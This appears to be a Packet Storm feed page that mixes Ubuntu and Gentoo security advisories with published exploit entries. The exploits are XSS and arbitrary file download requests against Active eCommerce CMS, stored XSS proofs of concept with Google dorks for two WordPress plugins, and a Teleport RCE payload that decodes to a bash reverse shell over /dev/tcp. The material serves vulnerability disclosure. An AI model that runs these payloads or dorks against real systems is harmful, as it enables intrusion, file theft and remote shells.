Ubuntu Security Notice 5635-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of- bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Duoming Zhou discovered that race conditions existed in the timer handling implementation of the Linux kernel's Rose X.25 protocol layer, resulting in use-after-free vulnerabilities. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5635-1  
September 23, 2022

linux-gkeop vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems

Details:

It was discovered that the framebuffer driver on the Linux kernel did not  
verify size limits when changing font or screen size, leading to an out-of-  
bounds write. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2021-33655)

Duoming Zhou discovered that race conditions existed in the timer handling  
implementation of the Linux kernel's Rose X.25 protocol layer, resulting in  
use-after-free vulnerabilities. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2022-2318)

Roger Pau Monné discovered that the Xen virtual block driver in the Linux  
kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-26365)

Roger Pau Monné discovered that the Xen paravirtualization frontend in the  
Linux kernel did not properly initialize memory pages to be used for shared  
communication with the backend. A local attacker could use this to expose  
sensitive information (guest kernel memory). (CVE-2022-33740)

It was discovered that the Xen paravirtualization frontend in the Linux  
kernel incorrectly shared unrelated data when communicating with certain  
backends. A local attacker could use this to cause a denial of service  
(guest crash) or expose sensitive information (guest kernel memory).  
(CVE-2022-33741, CVE-2022-33742)

Jan Beulich discovered that the Xen network device frontend driver in the  
Linux kernel incorrectly handled socket buffers (skb) references when  
communicating with certain backends. A local attacker could use this to  
cause a denial of service (guest crash). (CVE-2022-33743)

Oleksandr Tyshchenko discovered that the Xen paravirtualization platform in  
the Linux kernel on ARM platforms contained a race condition in certain  
situations. An attacker in a guest VM could use this to cause a denial of  
service in the host OS. (CVE-2022-33744)

It was discovered that the virtio RPMSG bus driver in the Linux kernel  
contained a double-free vulnerability in certain error conditions. A local  
attacker could possibly use this to cause a denial of service (system  
crash). (CVE-2022-34494, CVE-2022-34495)

Domingo Dirutigliano and Nicola Guerrera discovered that the netfilter  
subsystem in the Linux kernel did not properly handle rules that truncated  
packets below the packet header size. When such rules are in place, a  
remote attacker could possibly use this to cause a denial of service  
(system crash). (CVE-2022-36946)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1003-gkeop   5.15.0-1003.5  
   linux-image-gkeop               5.15.0.1003.5  
   linux-image-gkeop-5.15          5.15.0.1003.5

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5635-1  
   CVE-2021-33655, CVE-2022-2318, CVE-2022-26365, CVE-2022-33740,  
   CVE-2022-33741, CVE-2022-33742, CVE-2022-33743, CVE-2022-33744,  
   CVE-2022-34494, CVE-2022-34495, CVE-2022-36946

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1003.5

Ubuntu Security Notice USN-5635-1

Active eCommerce CMS version 6.3.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Active eCommerce CMS Cross Site Scripting# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405# Version: Version 6.3.0# Tested on Ubuntu 18.04-------Request-----------POST /ajax-search HTTP/1.1Host: localhostContent-Length: 117sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Accept: */*X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36sec-ch-ua-platform: "Linux"Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663797922828%7D; TawkConnectionTime=0; XSRF-TOKEN=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB; active_ecommerce_cms_session=zQGudzxBZLEDymY6TvM4yDEKrxTAQJ7FAVIAQEBUConnection: close_token=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB&search=%3Cscript%3Ealert(%22oh+bought+the+happines%22)%3C%2Fscript%3E

Active eCommerce CMS 6.3.0 Cross Site Scripting

Active eCommerce CMS version 6.3.0 suffers from an arbitrary file download vulnerability.

    # Exploit Title: Active eCommerce CMS Arbitrary File Download# Exploit Author: th3d1gger# Vendor Homepage: https://codecanyon.net# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405# Version: Version 6.3.0# Tested on Ubuntu 18.04without authentication with for loop user can download all files on the website with numeric ids./aiz-uploadder/download/{id}<--Vulnerable source code-->public function attachment_download($id)    {        $project_attachment = Upload::find($id);        try{           $file_path = public_path($project_attachment->file_name);            return Response::download($file_path);        }catch(\Exception $e){            flash(translate('File does not exist!'))->error();            return back();        }    }-------Request-----------GET /aiz-uploader/download/3 HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36sec-ch-ua-platform: "Linux"Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663797922828%7D; TawkConnectionTime=0; XSRF-TOKEN=CPX7GmsCyaC1NSvSVXt1Ukjv6BDMmcEFsFYijPYB; active_ecommerce_cms_session=zQGudzxBZLEDymY6TvM4yDEKrxTAQJ7FAVIAQEBUConnection: close

Active eCommerce CMS 6.3.0 Arbitrary File Download

Gentoo Linux Security Advisory 202209-8 - Multiple vulnerabilities have been discovered in Smokeping, the worst of which could result in root privilege escalation. Versions less than or equal to 2.7.3-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Smokeping: Multiple vulnerabilities  
     Date: September 25, 2022  
     Bugs: #631140, #602562  
       ID: 202209-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Smokeping, the worst of  
which could result in root privilege escalation.

Background  
==========

Smokeping is a powerful latency measurement tool

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-analyzer/smokeping     <= 2.7.3-r1               Vulnerable!

Description  
===========

Multiple vulnerabilities have been discovered in Smokeping. Please  
review the CVE identifiers referenced below for details.

Impact  
======

A local attacker which gains access to the smokeping user could gain  
root privileges.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for Smokeping. We recommend that users  
remove it:

  # emerge --ask --depclean "net-analyzer/smokeping"

References  
==========

[ 1 ] CVE-2017-20147  
      https://nvd.nist.gov/vuln/detail/CVE-2017-20147

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-08

Ubuntu Security Notice 5629-1 - It was discovered that the Python http.server module incorrectly handled certain URIs. An attacker could potentially use this to redirect web traffic.

    ==========================================================================Ubuntu Security Notice USN-5629-1September 22, 2022python3.5 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Python could be made to redirect web traffic if its http.serverreceived a specially crafted request.Software Description:- python3.5: An interactive high-level object-oriented languageDetails:It was discovered that the Python http.server module incorrectly handledcertain URIs. An attacker could potentially use this to redirect web traffic.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libpython3.5                         3.5.2-2ubuntu0~16.04.13+esm5   libpython3.5-minimal            3.5.2-2ubuntu0~16.04.13+esm5   libpython3.5-stdlib                3.5.2-2ubuntu0~16.04.13+esm5   python3.5                             3.5.2-2ubuntu0~16.04.13+esm5   python3.5-minimal                3.5.2-2ubuntu0~16.04.13+esm5After a standard system update you need to restart the python3 http.server to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5629-1   CVE-2021-28861

Ubuntu Security Notice USN-5629-1

Ubuntu Security Notice 5631-1 - It was discovered that libjpeg-turbo incorrectly handled certain EOF characters. An attacker could possibly use this issue to cause libjpeg-turbo to consume resource, leading to a denial of service. This issue only affected Ubuntu 18.04 LTS. It was discovered that libjpeg-turbo incorrectly handled certain malformed jpeg files. An attacker could possibly use this issue to cause libjpeg-turbo to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5631-1September 22, 2022libjpeg-turbo vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in libjpeg-turbo.Software Description:- libjpeg-turbo: library for handling JPEG filesDetails:It was discovered that libjpeg-turbo incorrectly handled certain EOFcharacters. An attacker could possibly use this issue to causelibjpeg-turbo to consume resource, leading to a denial of service. Thisissue only affected Ubuntu 18.04 LTS. (CVE-2018-11813)It was discovered that libjpeg-turbo incorrectly handled certain malformedjpeg files. An attacker could possibly use this issue to causelibjpeg-turbo to crash, resulting in a denial of service. (CVE-2020-17541,CVE-2020-35538)It was discovered that libjpeg-turbo incorrectly handled certain malformedPPM files. An attacker could use this issue to cause libjpeg-turbo tocrash, resulting in a denial of service, or possibly execute arbitrarycode. This issue only affected Ubuntu 20.04 LTS. (CVE-2021-46822)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  libjpeg-turbo8                  2.0.3-0ubuntu1.20.04.3  libturbojpeg                    2.0.3-0ubuntu1.20.04.3Ubuntu 18.04 LTS:  libjpeg-turbo8                  1.5.2-0ubuntu5.18.04.6  libturbojpeg                    1.5.2-0ubuntu5.18.04.6In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5631-1  CVE-2018-11813, CVE-2020-17541, CVE-2020-35538, CVE-2021-46822Package Information:  https://launchpad.net/ubuntu/+source/libjpeg-turbo/2.0.3-0ubuntu1.20.04.3  https://launchpad.net/ubuntu/+source/libjpeg-turbo/1.5.2-0ubuntu5.18.04.6

Ubuntu Security Notice USN-5631-1

WordPress 3dady Real-Time Web Stats plugin version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/# Date: 2022-08-24# Exploit Author: UnD3sc0n0c1d0# Vendor Homepage: https://profiles.wordpress.org/3dady/# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip# Category: Web Application# Version: 1.0# Tested on: Debian / WordPress 6.0.1# CVE : N/A# 1. Technical Description:The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of JavaScript code that can exploit the vulnerability.  # 2. Proof of Concept (PoC):  a. Install and activate version 1.0 of the plugin.  b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).  c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):    " autofocus onfocus=alert(/XSS/)>  d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed.  Note: This change will be permanent until you modify the edited fields.

WordPress 3dady Real-Time Web Stats 1.0 Cross Site Scripting

WordPress WP-UserOnline plugin version 2.88.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)# Google Dork: inurl:/wp-content/plugins/wp-useronline/# Date: 2022-08-24# Exploit Author: UnD3sc0n0c1d0# Vendor Homepage: https://github.com/lesterchan/wp-useronline# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip# Category: Web Application# Version: 2.88.0# Tested on: Debian / WordPress 6.0.1# CVE : CVE-2022-2941# Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c# 1. Technical Description:The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user accesses the injected page.  # 2. Proof of Concept (PoC):  a. Install and activate version 2.88.0 of the plugin.  b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings).  c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use     the following payload:    <script>alert(/XSS/)</script>  d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload      will be executed.Note: This change will be permanent until you modify the edited fields.

WordPress WP-UserOnline 2.88.0 Cross Site Scripting

Ubuntu Security Notice 5632-1 - Sebastian Chnelik discovered that OAuthLib incorrectly handled certain redirect uris. A remote attacker could possibly use this issue to cause OAuthLib to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5632-1September 22, 2022python-oauthlib vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:OAuthLib could be made to crash if it received specially crafted networktraffic.Software Description:- python-oauthlib: generic, spec-compliant implementation of OAuth for Python3Details:Sebastian Chnelik discovered that OAuthLib incorrectly handled certainredirect uris. A remote attacker could possibly use this issue to causeOAuthLib to crash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  python3-oauthlib                3.2.0-1ubuntu0.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5632-1  CVE-2022-36087Package Information:  https://launchpad.net/ubuntu/+source/python-oauthlib/3.2.0-1ubuntu0.1

Ubuntu Security Notice USN-5632-1

Teleport version 10.1.1 suffers from a remote code execution vulnerability.

    # Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)# Date: 08/01/2022# Exploit Author: Brandon Roach & Brian Landrum# Vendor Homepage: https://goteleport.com# Software Link: https://github.com/gravitational/teleport# Version: < 10.1.2# Tested on: Linux# CVE: CVE-2022-36633Proof of Concept (payload):https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=method=3DiamDecoded payload:"/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

Source

Packet Storm